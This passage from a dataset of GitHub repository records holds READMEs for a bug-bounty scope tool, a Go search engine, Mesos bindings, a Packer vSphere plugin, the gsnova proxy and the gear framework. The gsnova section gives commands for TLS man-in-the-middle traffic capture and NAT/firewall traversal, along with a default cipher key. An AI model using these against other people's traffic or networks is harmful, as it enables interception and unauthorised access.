-u\n```\nYou'll get a list like this:\n```\nhttps://hackerone.com/demo\nhttps://hackerone.com/something\n```\n\n## Beware of scope oddities\nIn an ideal world, all programs use the in-scope table in the same way to clearly show what's in scope, and make parsing easy.\nUnfortunately, that's not always the case.\n\nSometimes assets are assigned the wrong category.\nFor example, if you're going after URLs using the `-c url`, double checking using `-c all` is often a good idea.\n\nOther times, on HackerOne, you will find targets written in the scope description, instead of in the scope title.\nA few programs that do this are:\n- [Verizon Media](https://hackerone.com/verizonmedia/?type=team)\n- [Mail.ru](https://hackerone.com/mailru)\n\nIf you want to grep those URLs as well, you **MUST** include `d` in the printing options flag (`-o`).\n\nSometimes it gets even stranger: [Spotify](https://hackerone.com/spotify) uses titles of the in-scope table to list wildcards, but then lists the actually in-scope subdomains in the targets description.\n\nHuman minds are weird and this tool does not attempt to parse nonsense, you'll have to do that manually (or bother people that can make this change, maybe?).\n\n## Thanks\n- [0xatul](https://github.com/0xatul)\n- [JoeMilian](https://github.com/JoeMilian)\n- 
[ByteOven](https://github.com/ByteOven)\n- [dee-see](https://gitlab.com/dee-see)\n- [jub0bs](https://jub0bs.com)\n- [0xbeefed](https://github.com/0xbeefed)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "argusdusty/Ferret", "link": "https://github.com/argusdusty/Ferret", "tags": [], "stars": 547, "description": "An optimized substring search engine written in Go", "lang": "Go", "repo_lang": "", "readme": "Ferret\n======\n## An optimized substring search engine written in Go.\nFerret makes use of a combination of an Inverted Index and a Suffix Array to allow log-time lookups with a relatively small memory footprint.\nAlso incorporates error-correction (Levenshtein distance 1) and simple Unicode-to-ASCII conversion.\nAllows for arbitrary sorting functions\nAllows you to map arbitrary data to your results, and quickly update this data.\n\n***Author:*** Mark Canning
\n***Developed at/for:*** Tamber - http://www.tamber.com/\n\nInstalling\n----------\nInstall: `go get github.com/argusdusty/Ferret`
\nUpdate: `go get -u github.com/argusdusty/Ferret`
\nUse: `import \"github.com/argusdusty/Ferret\"`
\n\nPerformance\n-----------\nUses linear memory (~10-18 bytes per character)\nSearches performed in log time with the number of characters in the dictionary.\nSorted searches can be slow, taking ~linear time with the number of matches, rather than linear time with the results limit.\nInitialization takes linearithmic (ln(n)\\*n) time (being a sorting algorithm)\n\n\nThe code is meant to be as fast as possible for a substring dictionary search, and as such is best suited for medium-large dictionaries with ~1-100 million total characters. I've timed 10s initialization for 3.5 million characters on a modern CPU, and 10us search time (4000us with error-correction), so this system is capable of ~100,000 queries per second on a single processor - feel free to try the benchmarks in dictionaryexample.go.\n\nSample usage\n------------\n\n### Initializing the search engine:\n```go\n// Allows for exact (case-sensitive) substring searches over a list of songs \n// mapping their respective artists, allowing sorting by the song popularity\nSearchEngine := ferret.New(Songs, Artists, SongPopularities, func(s string) []byte { return []byte(s) })\n\n// Allows for lowercase-ASCII substring searches over a list of songs\n// mapping their respective artists, allowing sorting by the song popularity\nSearchEngine := ferret.New(Songs, Artists, SongPopularities, ferret.UnicodeToLowerASCII)\n\n// Allows for lowercase-ASCII substring searches over a list of artists,\n// allowing sorting by the artist popularity\nSearchEngine := ferret.New(Artists, Artists, ArtistPopularities, ferret.UnicodeToLowerASCII)\n```\n\t\t\n### Inserting a new element into the search engine:\n```go\n// Add a song to an existing SearchEngine, written by Artist,\n// and with popularity SongPopularity\nSearchEngine.Insert(Song, Artist, SongPopularity)\n```\n\n### Performing simple unsorted substring search:\n```go\n// For songs - returns a list of up to 25 artists of the matching songs,\n// and the song popularities\nSearchEngine.Query(SongQuery, 25)\n```\n\t\n### Performing a sorted substring search:\n```go\n// For songs - returns a list of up to 25 artists of the matching songs,\n// and the song popularities, sorted by the song popularities\n// assuming the song popularities are float64s\nSearchEngine.SortedQuery(SongQuery, 25, func(s string, v interface{}, l int, i int) float64 { return v.(float64) })\n```\n\n### More examples\t\nCheck out example/example.go and example/dictionaryexample.go for more example usage.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mesos/mesos-go", "link": "https://github.com/mesos/mesos-go", "tags": ["mesos"], "stars": 547, "description": "Go language bindings for Apache Mesos", "lang": "Go", "repo_lang": "", "readme": "# Go bindings for Apache Mesos\n\nPure Go language bindings for Apache Mesos, under development.\nAs with other pure implementations, mesos-go uses the HTTP wire protocol to communicate directly with a running Mesos master and its slave instances.\nOne of the objectives of this project is to provide an idiomatic Go API that makes it super easy to create Mesos frameworks using Go. 
\n\n[![Build Status](https://travis-ci.org/mesos/mesos-go.svg)](https://travis-ci.org/mesos/mesos-go)\n[![GoDoc](https://godoc.org/github.com/mesos/mesos-go?status.png)](https://godoc.org/github.com/mesos/mesos-go)\n[![Coverage Status](https://coveralls.io/repos/github/mesos/mesos-go/badge.svg?branch=master)](https://coveralls.io/github/mesos/mesos-go?branch=master)\n\n## Status\nNew projects should use the Mesos v1 API bindings, located in `api/v1`.\nUnless otherwise indicated, the remainder of this README describes the Mesos v1 API implementation.\n\nPlease **vendor** this library to avoid unpleasant surprises via `go get ...`.\n\nThe Mesos v0 API version of the bindings, located in `api/v0`, are more mature but will not see any major development besides critical compatibility and bug fixes.\n\n### Compatibility\n`mesos-N` tags mark the start of support for a specific Mesos version while maintaining backwards compatibility with the previous major version.\n\n### Features\n- The SchedulerDriver API implemented\n- The ExecutorDriver API implemented\n- Example programs on how to use the API\n- Modular design for easy readability/extensibility\n\n### Pre-Requisites\n- Go 1.7 or higher; https://golang.org/dl/\n - A standard and working Go workspace setup (multiple golang versions are tested via CI)\n- Apache Mesos 1.x; http://mesos.apache.org/downloads/\n- protoc compiler; https://github.com/google/protobuf/releases\n - v3.3.x is tested by CI and should be used for code generation\n- `govendor`; https://github.com/kardianos/govendor\n\n## Installing\nUsers of this library are encouraged to vendor it. API stability isn't guaranteed at this stage.\n```shell\n# download the source code\n$ go get -d github.com/mesos/mesos-go\n\n# build the example binaries\n$ cd $GOPATH/src/github.com/mesos/mesos-go\n$ make install\n```\n\n## Testing\n```shell\n$ make test\n```\n\n## Contributing\nContributions are welcome. Please refer to [CONTRIBUTING.md](CONTRIBUTING.md) for\nguidelines.\n\n## License\nThis project is [Apache License 2.0](LICENSE).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jetbrains-infra/packer-builder-vsphere", "link": "https://github.com/jetbrains-infra/packer-builder-vsphere", "tags": ["vsphere", "packer"], "stars": 547, "description": "Packer plugin for remote builds on VMware vSphere", "lang": "Go", "repo_lang": "", "readme": "[![Team project](http://jb.gg/badges/obsolete.svg)](https://confluence.jetbrains.com/display/ALL/JetBrains+on+GitHub)\n[![GitHub latest release](https://img.shields.io/github/release/jetbrains-infra/packer-builder-vsphere.svg)](https://github.com/jetbrains-infra/packer-builder-vsphere/releases)\n[![GitHub downloads](https://img.shields.io/github/downloads/jetbrains-infra/packer-builder-vsphere/total.svg)](https://github.com/jetbrains-infra/packer-builder-vsphere/releases)\n[![TeamCity build status](https://img.shields.io/teamcity/http/teamcity.jetbrains.com/s/PackerVSphere_Build.svg)](https://teamcity.jetbrains.com/viewType.html?buildTypeId=PackerVSphere_Build&guest=1)\n\n# Deprecation notice\nThis plugin was merged into [official Packer repository](https://github.com/hashicorp/packer) and released with Packer since version 1.5.2.\n \nPlease use modern version of Packer and report problems, feature suggestions to main Packer repository.\n\nThis repository left for history and archived. 
\n\n\n# Packer Builder for VMware vSphere\n\nThis a plugin for [HashiCorp Packer](https://www.packer.io/). It uses native vSphere API, and creates virtual machines remotely.\n\n`vsphere-iso` builder creates new VMs from scratch.\n`vsphere-clone` builder clones VMs from existing templates.\n\n- VMware Player is not required.\n- Official vCenter API is used, no ESXi host [modification](https://www.packer.io/docs/builders/vmware-iso.html#building-on-a-remote-vsphere-hypervisor) is required.\n\n## Installation\n* Download binaries from the [releases page](https://github.com/jetbrains-infra/packer-builder-vsphere/releases).\n* [Install](https://www.packer.io/docs/extending/plugins.html#installing-plugins) the plugins, or simply put them into the same directory with JSON templates. On Linux and macOS run `chmod +x` on the files.\n\n## Build\n\nInstall Go and [dep](https://github.com/golang/dep/releases), run `build.sh`.\n\nOr build inside a container by Docker Compose:\n```\ndocker-compose run build\n```\n\nThe binaries will be in `bin/` directory.\n\nArtifacts can be also downloaded from [TeamCity builds](https://teamcity.jetbrains.com/viewLog.html?buildTypeId=PackerVSphere_Build&buildId=lastSuccessful&tab=artifacts&guest=1).\n\n## Examples\n\nSee complete Ubuntu, Windows, and macOS templates in the [examples folder](https://github.com/jetbrains-infra/packer-builder-vsphere/tree/master/examples/).\n\n## Parameter Reference\n\n### Connection\n\n* `vcenter_server`(string) - vCenter server hostname.\n* `username`(string) - vSphere username.\n* `password`(string) - vSphere password.\n* `insecure_connection`(boolean) - Do not validate vCenter server's TLS certificate. Defaults to `false`.\n* `datacenter`(string) - VMware datacenter name. Required if there is more than one datacenter in vCenter.\n\n### VM Location\n\n* `vm_name`(string) - Name of the new VM to create.\n* `folder`(string) - VM folder to create the VM in.\n* `host`(string) - ESXi host where target VM is created. A full path must be specified if the host is in a folder. For example `folder/host`. See the `Specifying Clusters and Hosts` section above for more details.\n* `cluster`(string) - ESXi cluster where target VM is created. See [Working with Clusters](#working-with-clusters).\n* `resource_pool`(string) - VMWare resource pool. Defaults to the root resource pool of the `host` or `cluster`.\n* `datastore`(string) - VMWare datastore. Required if `host` is a cluster, or if `host` has multiple datastores.\n* `notes`(string) - VM notes.\n\n### VM Location (`vsphere-clone` only)\n\n* `template`(string) - Name of source VM. Path is optional.\n* `linked_clone`(boolean) - Create VM as a linked clone from latest snapshot. Defaults to `false`.\n\n### Hardware\n\n* `CPUs`(number) - Number of CPU sockets.\n* `cpu_cores`(number) - Number of CPU cores per socket.\n* `CPU_limit`(number) - Upper limit of available CPU resources in MHz.\n* `CPU_reservation`(number) - Amount of reserved CPU resources in MHz.\n* `CPU_hot_plug`(boolean) - Enable CPU hot plug setting for virtual machine. Defaults to `false`.\n* `RAM`(number) - Amount of RAM in MB.\n* `RAM_reservation`(number) - Amount of reserved RAM in MB.\n* `RAM_reserve_all`(boolean) - Reserve all available RAM. Defaults to `false`. Cannot be used together with `RAM_reservation`.\n* `RAM_hot_plug`(boolean) - Enable RAM hot plug setting for virtual machine. 
Defaults to `false`.\n* `video_ram`(number) - Amount of video memory in MB.\n* `disk_size`(number) - The size of the disk in MB.\n* `network`(string) - Set network VM will be connected to.\n* `NestedHV`(boolean) - Enable nested hardware virtualization for VM. Defaults to `false`.\n* `configuration_parameters`(map) - Custom parameters.\n* `boot_order`(string) - Priority of boot devices. Defaults to `disk,cdrom`\n\n### Hardware (`vsphere-iso` only)\n\n* `vm_version`(number) - Set VM hardware version. Defaults to the most current VM hardware version supported by vCenter. See [VMWare article 1003746](https://kb.vmware.com/s/article/1003746) for the full list of supported VM hardware versions.\n* `guest_os_type`(string) - Set VM OS type. Defaults to `otherGuest`. See [here](https://pubs.vmware.com/vsphere-6-5/index.jsp?topic=%2Fcom.vmware.wssdk.apiref.doc%2Fvim.vm.GuestOsDescriptor.GuestOsIdentifier.html) for a full list of possible values.\n* `disk_controller_type`(string) - Set VM disk controller type. Example `pvscsi`.\n* `disk_thin_provisioned`(boolean) - Enable VMDK thin provisioning for VM. Defaults to `false`.\n* `network_card`(string) - Set VM network card type. Example `vmxnet3`.\n* `usb_controller`(boolean) - Create USB controller for virtual machine. Defaults to `false`.\n* `cdrom_type`(string) - Which controller to use. Example `sata`. Defaults to `ide`.\n* `firmware`(string) - Set the Firmware at machine creation. Example `efi`. Defaults to `bios`.\n\n\n### Boot (`vsphere-iso` only)\n\n* `iso_paths`(array of strings) - List of datastore paths to ISO files that will be mounted to the VM. Example `\"[datastore1] ISO/ubuntu.iso\"`.\n* `floppy_files`(array of strings) - List of local files to be mounted to the VM floppy drive. Can be used to make Debian preseed or RHEL kickstart files available to the VM.\n* `floppy_dirs`(array of strings) - List of directories to copy files from.\n* `floppy_img_path`(string) - Datastore path to a floppy image that will be mounted to the VM. Example `[datastore1] ISO/pvscsi-Windows8.flp`.\n* `http_directory`(string) - Path to a directory to serve using a local HTTP server. Beware of [limitations](https://github.com/jetbrains-infra/packer-builder-vsphere/issues/108#issuecomment-449634324).\n* `http_ip`(string) - Specify IP address on which the HTTP server is started. If not provided the first non-loopback interface is used.\n* `http_port_min` and `http_port_max` as in other [builders](https://www.packer.io/docs/builders/virtualbox-iso.html#http_port_min).\n* `iso_urls`(array of strings) - Multiple URLs for the ISO to download. Packer will try these in order. If anything goes wrong attempting to download or while downloading a single URL, it will move on to the next. All URLs must point to the same file (same checksum). By default this is empty and iso_url is used. Only one of iso_url or iso_urls can be specified.\n* `iso_checksum `(string) - The checksum for the OS ISO file. Because ISO files are so large, this is required and Packer will verify it prior to booting a virtual machine with the ISO attached. The type of the checksum is specified with iso_checksum_type, documented below. At least one of iso_checksum and iso_checksum_url must be defined. This has precedence over iso_checksum_url type.\n* `iso_checksum_type`(string) - The type of the checksum specified in iso_checksum. Valid values are none, md5, sha1, sha256, or sha512 currently. 
While none will skip checksumming, this is not recommended since ISO files are generally large and corruption does happen from time to time.\n* `iso_checksum_url`(string) - A URL to a GNU or BSD style checksum file containing a checksum for the OS ISO file. At least one of iso_checksum and iso_checksum_url must be defined. This will be ignored if iso_checksum is non empty.\n* `boot_wait`(string) Amount of time to wait for the VM to boot. Examples 45s and 10m. Defaults to 10 seconds. See [format](https://golang.org/pkg/time/#ParseDuration).\n* `boot_command`(array of strings) - List of commands to type when the VM is first booted. Used to initalize the operating system installer. See details in [Packer docs](https://www.packer.io/docs/builders/virtualbox-iso.html#boot-command).\n\n### Provision\n\n* `communicator` - `ssh` (default), `winrm`, or `none` (create/clone, customize hardware, but do not boot).\n* `ip_wait_timeout`(string) - Amount of time to wait for VM's IP, similar to 'ssh_timeout'. Defaults to 30m (30 minutes). See the Go Lang [ParseDuration](https://golang.org/pkg/time/#ParseDuration) documentation for full details.\n* `ip_settle_timeout`(string) - Amount of time to wait for VM's IP to settle down, sometimes VM may report incorrect IP initially, then its recommended to set that parameter to apx. 2 minutes. Examples 45s and 10m. Defaults to 5s(5 seconds). See the Go Lang [ParseDuration](https://golang.org/pkg/time/#ParseDuration) documentation for full details.\n* `ssh_username`(string) - Username in guest OS.\n* `ssh_password`(string) - Password to access guest OS. Only specify `ssh_password` or `ssh_private_key_file`, but not both.\n* `ssh_private_key_file`(string) - Path to the SSH private key file to access guest OS. Only specify `ssh_password` or `ssh_private_key_file`, but not both.\n* `winrm_username`(string) - Username in guest OS.\n* `winrm_password`(string) - Password to access guest OS.\n* `shutdown_command`(string) - Specify a VM guest shutdown command. VMware guest tools are used by default.\n* `shutdown_timeout`(string) - Amount of time to wait for graceful VM shutdown. Examples 45s and 10m. Defaults to 5m(5 minutes). See the Go Lang [ParseDuration](https://golang.org/pkg/time/#ParseDuration) documentation for full details.\n\n### Postprocessing\n\n* `create_snapshot`(boolean) - Create a snapshot when set to `true`, so the VM can be used as a base for linked clones. Defaults to `false`.\n* `convert_to_template`(boolean) - Convert VM to a template. Defaults to `false`.\n\n## Working with Clusters\n#### Standalone Hosts\nOnly use the `host` option. Optionally specify a `resource_pool`:\n```\n\"host\": \"esxi-1.vsphere65.test\",\n\"resource_pool\": \"pool1\",\n```\n\n#### Clusters Without DRS\nUse the `cluster` and `host `parameters:\n```\n\"cluster\": \"cluster1\",\n\"host\": \"esxi-2.vsphere65.test\",\n```\n\n#### Clusters With DRS\nOnly use the `cluster` option. 
Optionally specify a `resource_pool`:\n```\n\"cluster\": \"cluster2\",\n\"resource_pool\": \"pool1\",\n```\n\n## Required vSphere Permissions\n\n* VM folder (this object and children):\n ```\n Virtual machine -> Inventory\n Virtual machine -> Configuration\n Virtual machine -> Interaction\n Virtual machine -> Snapshot management\n Virtual machine -> Provisioning\n ```\n Individual privileges are listed in https://github.com/jetbrains-infra/packer-builder-vsphere/issues/97#issuecomment-436063235.\n* Resource pool, host, or cluster (this object): \n ```\n Resource -> Assign virtual machine to resource pool\n ```\n* Host in clusters without DRS (this object): \n ```\n Read-only\n ```\n* Datastore (this object): \n ```\n Datastore -> Allocate space\n Datastore -> Browse datastore\n Datastore -> Low level file operations\n ``` \n* Network (this object): \n ```\n Network -> Assign network\n ```\n* Distributed switch (this object): \n ```\n Read-only\n ```\n\nFor floppy image upload:\n\n* Datacenter (this object): \n ```\n Datastore -> Low level file operations\n ```\n* Host (this object): \n ```\n Host -> Configuration -> System Management\n ```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "yinqiwen/gsnova", "link": "https://github.com/yinqiwen/gsnova", "tags": ["tcp", "quic", "kcp", "tls", "http2", "http", "websocket", "ssh", "proxy", "transparent-proxy", "mitmproxy", "packet-capture", "nat", "p2p", "p2s2p", "low-memory"], "stars": 546, "description": "Private proxy solution & network troubleshooting tool.", "lang": "Go", "repo_lang": "", "readme": "GSnova: Private Proxy Solution & Network Troubleshooting Tool. \r\n[![Join the chat at https://gitter.im/gsnova/Lobby](https://badges.gitter.im/gsnova/Lobby.svg)](https://gitter.im/gsnova/Lobby?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\r\n[![Build Status](https://travis-ci.org/yinqiwen/gsnova.svg?branch=master)](https://travis-ci.org/yinqiwen/gsnova)\r\n\r\n``` \r\n \r\n\t ___ ___ ___ ___ ___ ___ \r\n\t /\\ \\ /\\ \\ /\\__\\ /\\ \\ /\\__\\ /\\ \\ \r\n\t /::\\ \\ /::\\ \\ /::| | /::\\ \\ /:/ / /::\\ \\ \r\n\t /:/\\:\\ \\ /:/\\ \\ \\ /:|:| | /:/\\:\\ \\ /:/ / /:/\\:\\ \\ \r\n\t /:/ \\:\\ \\ _\\:\\~\\ \\ \\ /:/|:| |__ /:/ \\:\\ \\ /:/__/ ___ /::\\~\\:\\ \\ \r\n\t /:/__/_\\:\\__\\/\\ \\:\\ \\ \\__\\/:/ |:| /\\__\\/:/__/ \\:\\__\\|:| | /\\__\\/:/\\:\\ \\:\\__\\\r\n\t \\:\\ /\\ \\/__/\\:\\ \\:\\ \\/__/\\/__|:|/:/ /\\:\\ \\ /:/ /|:| |/:/ /\\/__\\:\\/:/ /\r\n\t \\:\\ \\:\\__\\ \\:\\ \\:\\__\\ |:/:/ / \\:\\ /:/ / |:|__/:/ / \\::/ / \r\n\t \\:\\/:/ / \\:\\/:/ / |::/ / \\:\\/:/ / \\::::/__/ /:/ / \r\n\t \\::/ / \\::/ / /:/ / \\::/ / ~~~~ /:/ / \r\n\t \\/__/ \\/__/ \\/__/ \\/__/ \\/__/ \r\n \r\n \r\n```\r\n**Deprecated, use the rust version [rsnova](https://github.com/yinqiwen/rsnova) instead.**\r\n\r\n# Features\r\n- Multiple transport channel support\r\n - http/https\r\n - http2\r\n - websocket\r\n - tcp/tls\r\n - quic\r\n - kcp\r\n - ssh\r\n- Multiplexing \r\n - All proxy connections running over N persist proxy channel connections\r\n- Simple PAC(Proxy Auto Config)\r\n- Multiple Ciphers support\r\n - Chacha20Poly1305\r\n - Salsa20\r\n - AES128\r\n- HTTP/Socks4/Socks5 Proxy\r\n - Local client running as HTTP/Socks4/Socks5 Proxy\r\n- Transparent TCP/UDP Proxy\r\n\t- Transparent tcp/udp proxy implementation in pure golang\r\n- Multi-hop Proxy\r\n- TLS man-in-the-middle(MITM) Proxy\r\n- HTTP(S) Packet Capture for Web Debugging\r\n\t- Log 
HTTP(S) Packets in file\r\n\t- Forward HTTP(S) Packets to Remote HTTP Server\r\n- P2P/P2S2P Proxy\r\n - P2P: Use TCP NAT tunnel for direct P2P commnunication if possible\r\n - P2S2P: Use middle server for two peers to communication\r\n - Use UPNP to expose port for remote p2p peer if possible.\r\n- Low-memory Environments Support\r\n - Use less than 20MB RSS memory at client/server side\r\n\r\n\r\n# Usage\r\n**go1.9 or higher is requied.**\r\n\r\n## Compile\r\n```shell\r\n go get -t -u -v github.com/yinqiwen/gsnova\r\n```\r\nThere is also prebuilt binary release at [here](https://github.com/yinqiwen/gsnova/releases)\r\n\r\n## Command Line Usage\r\n```\r\nUsage of ./gsnova:\r\n -admin string\r\n \tClient Admin listen address\r\n -blackList value\r\n \tProxy blacklist item config\r\n -client\r\n \tLaunch gsnova as client.\r\n -cmd\r\n \tLaunch gsnova by command line without config file.\r\n -cnip string\r\n \tChina IP list. (default \"./cnipset.txt\")\r\n -conf string\r\n \tConfig file of gsnova.\r\n -forward value\r\n \tForward connection to specified address\r\n -hosts string\r\n \tHosts file of gsnova client. (default \"./hosts.json\")\r\n -httpdump.dst string\r\n \tHTTP Dump destination file or http url\r\n -httpdump.filter value\r\n \tHTTP Dump Domain Filter, eg:*.google.com\r\n -key string\r\n \tCipher key for transmission between local&remote. (default \"809240d3a021449f6e67aa73221d42df942a308a\")\r\n -listen value\r\n \tListen on address.\r\n -log string\r\n \tLog file setting (default \"color,gsnova.log\")\r\n -mitm\r\n \tLaunch gsnova as a MITM Proxy\r\n -ots string\r\n \tOnline trouble shooting listen address\r\n -p2p string\r\n \tP2P Token.\r\n -pid string\r\n \tPID file (default \".gsnova.pid\")\r\n -ping_interval int\r\n \tChannel ping interval seconds. (default 30)\r\n -pprof string\r\n \tPProf trouble shooting listen address\r\n -proxy string\r\n \tProxy setting to connect remote server.\r\n -remote value\r\n \tNext remote proxy hop server to connect for client, eg:wss://xxx.paas.com\r\n -servable\r\n \tClient as a proxy server for peer p2p client\r\n -server\r\n \tLaunch gsnova as server.\r\n -stream_idle int\r\n \tMux stream idle timout seconds. (default 10)\r\n -tls.cert string\r\n \tTLS Cert file\r\n -tls.key string\r\n \tTLS Key file\r\n -upnp int\r\n \tUPNP port to expose for p2p.\r\n -user string\r\n \tUsername for remote server to authorize. (default \"gsnova\")\r\n -version\r\n \tPrint version.\r\n -whitelist value\r\n \tProxy whitelist item config\r\n -window string\r\n \tMax mux stream window size, default 512K\r\n -window_refresh string\r\n \tMux stream window refresh size, default 32K\r\n```\r\n\r\n## Deploy & Run Server\r\n\r\n```shell\r\n ./gsnova -cmd -server -listen tcp://:48100 -listen quic://:48100 -listen tls://:48101 -listen kcp://:48101 -listen http://:48102 -listen http2://:48103 -key 809240d3a021449f6e67aa73221d42df942a308a -user \"*\"\r\n```\r\nThis would launch a running instance listening at serveral ports with different transport protocol. \r\n\r\nThe server can also be deployed to serveral PAAS service like heroku/openshift and some docker host service. 
\r\n\r\n## Deploy & Run Client\r\n\r\n### Run From Command Line\r\n```\r\n ./gsnova -cmd -client -listen :48100 -remote http2://app1.openshiftapps.com -key 809240d3a021449f6e67aa73221d42df942a308a\r\n```\r\nThis would launch a socks4/socks5/http proxy at port 48100 and use http2://app1.openshiftapps.com as next proxy hop.\r\n\r\n### Run With Confguration\r\n\r\nThis is a sample for [client.json](https://github.com/yinqiwen/gsnova/blob/master/client.json), the `Key` and the `ServerList` need to be modified to match your server.\r\n```\r\n ./gsnova -client -conf ./client.json\r\n```\r\n\r\n### Advanced Usage\r\n#### Multi-Hop Proxy\r\nGSnova support more than ONE remote server as the next hops, just add more `-remote server` arguments to enable multi-hop proxy. \r\nThis would use `http2://app1.openshiftapps.com` as the first proxy ho and use `wss://app2.herokuapp.com` as the final proxy hop.\r\n```shell\r\n ./gsnova -cmd -client -listen :48101 -remote http2://app1.openshiftapps.com -remote wss://app2.herokuapp.com -key 809240d3a021449f6e67aa73221d42df942a308a\r\n```\r\n#### Transparent Proxy\r\n- Edit iptables rules.\r\n- It's only works on linux.\r\n\r\n#### MITM Proxy\r\nGSnova support running the client as a MITM proxy to capture HTTP(S) packets for web debuging. \r\nThis would capture HTTP(S) traffic packets into local dist file `httpdump.log`.\r\n```shell\r\n ./gsnova -cmd -client -listen :48101 -remote direct -mitm -httpdump.dst ./httpdump.log -httpdump.filter \"*.google.com\" -httpdump.filter \"*.facebook.com\"\r\n```\r\n\r\n#### P2P/P2S2P Proxy\r\nP2P/P2S2P Proxy can help you to connect two nodes, and use one of them as a tcp proxy server for the other one. This feature can be used for scenarios like: \r\n- Expose any tcp based service behind a NAT or firewall to a specific node in the internet.\r\n\r\nThere are 3 nodes which should install/run gsnova, a middle server(S) with public IP address, two client nodes(A & B) behind a NAT or firewall. \r\nFor the middle server(S), run as a server with a cipher key.\r\n```shell\r\n ./gsnova -cmd -server -listen tcp://:48103 -key p2pkey -log color\r\n```\r\nFor the node(B) as a proxy server, run as a client to connect server with a P2P token:\r\n```shell\r\n ./gsnova -cmd -client -servable -key p2pkey -remote tcp://:48103 -p2p testp2p -log color \r\n```\r\nFor the node(A) as a client for peer proxy server, run as a client to connect server with same P2P token:\r\n```shell\r\n ./gsnova -cmd -client -listen :7788 -key p2pkey -remote tcp://:48103 -p2p testp2p -log color \r\n```\r\nIf there is no error, now the node A with listen address :7788 can be used as a http/socks4/socks5 proxy to access servers behind a NAT or firewall which node B located in. \r\n\r\nAnd in gsnova, it would try to run with P2P mode first, if it's not pissible, it would use P2S2P mode which would use the middle server to forward tcp stream to remote peeer. \r\n\r\n## Mobile Client(Android)\r\nThe client side can be compiled to android library by `gomobile`, eg:\r\n```\r\n gomobile bind -target=android -a -v github.com/yinqiwen/gsnova/local/gsnova\r\n```\r\nUsers can develop there own app by using the generated `gsnova.aar`. \r\nThere is a very simple andorid app [gsnova-android-v0.27.3.1.zip](https://github.com/yinqiwen/gsnova/releases/download/v0.27.3/gsnova-android-v0.27.3.1.zip) which use `tun2socks` + `gsnova` to build. 
\r\n\r\n\r\n\r\n\r\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "teambition/gear", "link": "https://github.com/teambition/gear", "tags": ["gear", "middleware", "hooks", "router", "logging", "http2", "server-push", "go", "web", "framework"], "stars": 546, "description": "A lightweight, composable and high performance web service framework for Go.", "lang": "Go", "repo_lang": "", "readme": "![Gear](https://raw.githubusercontent.com/teambition/gear/master/gear.png)\n\n[![CI](https://github.com/teambition/gear/actions/workflows/ci-cover.yml/badge.svg)](https://github.com/teambition/gear/actions/workflows/ci-cover.yml)\n[![Codecov](https://codecov.io/gh/teambition/gear/branch/master/graph/badge.svg)](https://codecov.io/gh/teambition/gear)\n[![CodeQL](https://github.com/teambition/gear/actions/workflows/codeql.yml/badge.svg)](https://github.com/teambition/gear/actions/workflows/codeql.yml)\n[![Go Reference](https://pkg.go.dev/badge/github.com/teambition/gear.svg)](https://pkg.go.dev/github.com/teambition/gear)\n[![License](http://img.shields.io/badge/license-mit-blue.svg?style=flat-square)](https://raw.githubusercontent.com/teambition/gear/master/LICENSE)\n\nA lightweight, composable and high performance web service framework for Go.\n\n## Features\n\n- Effective and flexible middlewares flow control, create anything by middleware\n- Powerful and smart HTTP error handling\n- Trie base gear.Router, as faster as [HttpRouter](https://github.com/julienschmidt/httprouter), support regexp parameters and group routes\n- Integrated timeout context.Context\n- Integrated response content compress\n- Integrated structured logging middleware\n- Integrated request body parser\n- Integrated signed cookies\n- Integrated JSON, JSONP, XML and HTML renderer\n- Integrated CORS, Secure, Favicon and Static middlewares\n- More useful methods on gear.Context to manipulate HTTP Request/Response\n- Run HTTP and gRPC on the same port\n- Completely HTTP/2.0 supported\n\n## Documentation\n\n[Go-Documentation](https://godoc.org/github.com/teambition/gear)\n\n## Import\n\n```go\n// package gear\nimport \"github.com/teambition/gear\"\n```\n\n## Design\n\n1. [Server \u5e95\u5c42\u57fa\u4e8e\u539f\u751f net/http \u800c\u4e0d\u662f fasthttp](https://github.com/teambition/gear/blob/master/doc/design.md#1-server-\u5e95\u5c42\u57fa\u4e8e\u539f\u751f-nethttp-\u800c\u4e0d\u662f-fasthttp)\n1. [\u901a\u8fc7 gear.Middleware \u4e2d\u95f4\u4ef6\u6a21\u5f0f\u6269\u5c55\u529f\u80fd\u6a21\u5757](https://github.com/teambition/gear/blob/master/doc/design.md#2-\u901a\u8fc7-gearmiddleware-\u4e2d\u95f4\u4ef6\u6a21\u5f0f\u6269\u5c55\u529f\u80fd\u6a21\u5757)\n1. [\u4e2d\u95f4\u4ef6\u7684\u5355\u5411\u987a\u5e8f\u6d41\u7a0b\u63a7\u5236\u548c\u7ea7\u8054\u6d41\u7a0b\u63a7\u5236](https://github.com/teambition/gear/blob/master/doc/design.md#3-\u4e2d\u95f4\u4ef6\u7684\u5355\u5411\u987a\u5e8f\u6d41\u7a0b\u63a7\u5236\u548c\u7ea7\u8054\u6d41\u7a0b\u63a7\u5236)\n1. [\u529f\u80fd\u5f3a\u5927\uff0c\u5b8c\u7f8e\u96c6\u6210 context.Context \u7684 gear.Context](https://github.com/teambition/gear/blob/master/doc/design.md#4-\u529f\u80fd\u5f3a\u5927\u5b8c\u7f8e\u96c6\u6210-contextcontext-\u7684-gearcontext)\n1. 
